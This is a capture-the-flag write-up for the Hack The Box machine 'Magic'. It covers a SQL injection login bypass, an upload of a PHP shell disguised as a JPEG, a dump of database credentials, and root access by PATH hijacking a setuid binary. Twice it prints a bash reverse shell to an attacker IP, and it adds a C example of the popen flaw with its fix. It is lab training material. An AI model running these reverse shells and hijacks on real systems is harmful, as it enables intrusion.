Recon

Nmap Scan

Nmap shows only the web and SSH ports open, and a full-port scan gives the same result. So we start with the web port.

# Nmap 7.80 scan initiated Wed May 27 11:54:13 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.185
Nmap scan report for 10.10.10.185
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 27 11:54:33 2020 -- 1 IP address (1 host up) scanned in 19.90 seconds

Foothold

  1. Visiting the web port reveals a login page, and the site is written in PHP. It hints that once logged in we can upload images. Using the login SQL injection bypass method described in this article, the login can be bypassed, and we log in as admin.

  2. After logging in, use this JPEG-SHELL from GitHub: download it locally, rename it to 444.php.jpg, and upload it; the upload succeeds.

  3. Browse to http://10.10.10.185/images/uploads/444.php.jpg and execute the following command to get a reverse shell

bash -c 'bash -i >& /dev/tcp/10.10.14.184/1337 0>&1'

~/Documents/HTB/Magic root@kali 1m 30s
❯ nc -nlvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.185.
Ncat: Connection from 10.10.10.185:33954.
bash: cannot set terminal process group (1176): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/Magic/images/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@ubuntu:/var/www/Magic/images/uploads$

User.txt

Inspecting the web directory, we find db.php5, which contains the database password.

<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';

    private static $cont = null;

    public function __construct() {
        die('Init function is not allowed');
    }

    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }

    public static function disconnect()
    {
        self::$cont = null;
    }
}

The mysql client binary is not installed, but mysqldump is, so we can use mysqldump to dump the database.

www-data@ubuntu:/var/www$ mysql
mysql_config_editor mysqld
mysql_embedded mysqld_multi
mysql_install_db mysqld_safe
mysql_plugin mysqldump
mysql_secure_installation mysqldumpslow
mysql_ssl_rsa_setup mysqlimport
mysql_tzinfo_to_sql mysqloptimize
mysql_upgrade mysqlpump
mysqladmin mysqlrepair
mysqlanalyze mysqlreport
mysqlbinlog mysqlshow
mysqlcheck mysqlslap
www-data@ubuntu:/var/www$ mysql

In the dumped content we find the password of the user admin: Th3s3usW4sK1ng

www-data@ubuntu:/var/www$ mysqldump -u theseus -p --all-databases
Enter password:
-- MySQL dump 10.13 Distrib 5.7.29, for Linux (x86_64)
--
-- Host: localhost Database:
-- ------------------------------------------------------
-- Server version 5.7.29-0ubuntu0.18.04.1

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Current Database: `Magic`
--

CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Magic` /*!40100 DEFAULT CHARACTER SET latin1 */;

USE `Magic`;

--
-- Table structure for table `login`
--

DROP TABLE IF EXISTS `login`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `login` (
`id` int(6) NOT NULL AUTO_INCREMENT,
`username` varchar(50) NOT NULL,
`password` varchar(100) NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `username` (`username`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `login`
--

LOCK TABLES `login` WRITE;
/*!40000 ALTER TABLE `login` DISABLE KEYS */;
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
/*!40000 ALTER TABLE `login` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2020-05-27 2:06:18

SSH is restricted to key-based login, so we cannot log in with the password; instead we use su - theseus to switch user and get user.txt.

www-data@ubuntu:/var/www$ su - theseus
Password:
theseus@ubuntu:~$ cat user.txt
556ec41c2135e5f95771baf818d441c9
theseus@ubuntu:~$

Privilege Escalation

We write an SSH key into .ssh so that we get a full shell. After that, running LinPEAS.sh shows that we can run /bin/sysinfo as root.

[+] Readable files belonging to root and readable by me but not world readable                                                                                                                                                             
-rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo

Checking it with strings shows that many of the commands it runs are not given with absolute paths.

theseus@ubuntu:/dev/shm$ strings /bin/sysinfo
...
popen() failed!
====================Hardware Info====================
lshw -short
====================Disk Info====================
fdisk -l
====================CPU Info====================
cat /proc/cpuinfo
====================MEM Usage=====================
free -h
...

We only need to create a file named cat (or one of the other commands) containing reverse shell code in a writable directory and add the current directory to the PATH environment variable (This Link); then when /bin/sysinfo is executed we get a reverse shell.

theseus@ubuntu:/dev/shm$ cat cat
bash -c 'bash -i >& /dev/tcp/10.10.14.184/1337 0>&1'
theseus@ubuntu:/dev/shm$ export PATH=.:$PATH
theseus@ubuntu:/dev/shm$ /bin/sysinfo
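The missing absolute paths are the whole bug: popen() hands each command to /bin/sh, which resolves bare names through the caller's PATH, so a setuid-root binary ends up running the caller's file. The C below is an added example, not the source of the box's /bin/sysinfo; it shows that vulnerable pattern beside the hardened form a maintainer would use (absolute paths plus a pinned PATH). The TRUSTED_PATH value and the function names are assumptions of this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Added example, not the box's /bin/sysinfo source: the popen()-on-bare-name pattern and its fix. */
static const char TRUSTED_PATH[] = "/usr/sbin:/usr/bin:/sbin:/bin";
/* Vulnerable: /bin/sh resolves bare names ("free", "cat", "lshw") via the caller's exported PATH. */
FILE *run_vulnerable(const char *cmd) { return popen(cmd, "r"); }
/* Hardened: only absolute paths, and PATH pinned to a trusted value before the shell starts. */
int command_is_absolute(const char *cmd) { return cmd != NULL && cmd[0] == '/'; }

FILE *run_hardened(const char *cmd) {
    if (!command_is_absolute(cmd) || setenv("PATH", TRUSTED_PATH, 1) != 0)
        return NULL;
    return popen(cmd, "r");
}

/* Read the first output line of a pipe into buf ("" if none) and close the pipe. */
static void first_line(FILE *fp, char *buf, size_t len) {
    if (fgets(buf, (int)len, fp) == NULL) buf[0] = '\0';
    buf[strcspn(buf, "\n")] = '\0';
    pclose(fp);
}

/* Writeup's `export PATH=.:$PATH`: 1 if the vulnerable call's shell inherits a PATH starting with "." */
int vulnerable_inherits_caller_path(void) {
    char seen[256];
    setenv("PATH", ".:/usr/bin:/bin", 1);
    FILE *fp = run_vulnerable("echo $PATH");   /* echo is a shell builtin */
    if (fp == NULL) return -1;
    first_line(fp, seen, sizeof seen);
    return strncmp(seen, ".:", 2) == 0;
}

/* Same polluted PATH, hardened call: 1 if the child saw only TRUSTED_PATH. */
int hardened_pins_path(void) {
    char seen[256];
    setenv("PATH", ".:/usr/bin:/bin", 1);
    FILE *fp = run_hardened("/bin/sh -c 'echo $PATH'");
    if (fp == NULL) return -1;
    first_line(fp, seen, sizeof seen);
    return strcmp(seen, TRUSTED_PATH) == 0;
}

int main(void) {  /* expect "1 1" */
    printf("%d %d\n", vulnerable_inherits_caller_path(), hardened_pins_path());
    return 0;
}
```

Dropping the setuid bit, or running the helpers directly with execve() and a fixed environment instead of through a shell, closes the same hole without relying on PATH at all.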

We get a root shell

~/Documents/HTB/Magic root@kali
❯ nc -nlvp 1337
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on 0.0.0.0:1337
Ncat: Connection from 10.10.10.185.
Ncat: Connection from 10.10.10.185:33960.
root@ubuntu:/dev/shm# id
id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
root@ubuntu:/dev/shm# cd /root
cd /root
root@ubuntu:/root# cat root.txt
cat root.txt
917f1d32c279b84c6fb40428ebe17192
root@ubuntu:/root#